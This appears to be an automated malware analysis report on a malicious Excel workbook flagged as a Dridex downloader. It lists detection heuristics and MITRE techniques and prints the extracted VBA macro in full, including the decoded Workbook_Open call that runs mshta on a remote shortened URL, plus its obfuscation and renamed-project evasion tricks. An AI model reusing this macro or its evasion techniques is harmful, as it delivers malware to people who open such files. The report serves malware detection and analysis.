Verdict: MALICIOUS
Risk Score: 240

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The VBA macro contains a Workbook_Open subroutine that uses CreateObject to instantiate a Shell.Application object. That object's ShellExecute method is then called with two StrReverse-obfuscated strings: the first decodes to 'mshta' and the second to 'https://www.bitly.com/ewayijhdwkjsi', a shortened URL that likely serves as the download location for a second-stage payload run through mshta.exe. The ClamAV detection name 'Xls.Downloader.DridexGreen09211-9890102-0' strongly suggests the Dridex family.
Heuristics (6)

- ClamAV: Xls.Downloader.DridexGreen09211-9890102-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.DridexGreen09211-9890102-0
- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings): Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/cuis.b)
- VBA project part renamed to evade filename detection (high, OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- Workbook_Open macro (high, OLE_VBA_WBOPEN)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1666 bytes | 0a057c7021710ddc587c16577bf609c57c03b013aa8a9ce79c69b7dd02627a54 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/cuis.b | 24064 bytes | 59cb9ced3b634b1a1e5c01662db25b3078bc1eee46772238d88b5852ffb72ed5 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "biilli"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function comanno()
comanno = (VBA.StrReverse("athsm"))
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub _
Workbook_Open _
()
phul _
. _
coomon _
. _
ShellExecute# biilli _
. _
comanno _
, bababa _
. _
kaoskdaosdk
End _
Sub
Attribute VB_Name = "bababa"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function _
kaoskdaosdk _
()
kaoskdaosdk _
= _
(VBA _
. _
StrReverse("isjkwdhjiyawe/moc.yltib.www//:sptth"))
End Function
Attribute VB_Name = "phul"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function _
coomon _
()
Set _
coomon _
= _
VBA _
. _
CreateObject("Shell.Application")
End Function
```

The source is split across four modules and heavily line-continued (`_`) to defeat simple line-based pattern matching. Collapsing the continuations gives a single statement in Workbook_Open: `phul.coomon.ShellExecute biilli.comanno, bababa.kaoskdaosdk`, where `coomon` returns a `Shell.Application` object, `comanno` decodes to `mshta`, and `kaoskdaosdk` decodes to `https://www.bitly.com/ewayijhdwkjsi`.